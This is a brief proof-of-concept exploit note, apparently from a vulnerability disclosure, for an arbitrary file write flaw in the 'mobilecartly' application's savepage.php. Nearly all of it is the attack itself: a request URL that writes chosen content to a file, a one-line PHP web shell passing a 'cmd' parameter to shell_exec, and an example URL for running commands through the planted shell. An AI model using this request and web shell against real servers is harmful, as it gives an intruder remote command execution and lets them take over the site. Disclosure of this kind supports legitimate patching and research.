# The application is prone to arbitrary file write / overwrite vulnerability.
# II. PoC EXPLOIT
# http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE
# FILENAME for example 'shell.php'
# CODE for example '<?php echo(shell_exec($_GET['cmd'])); ?>'
# Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir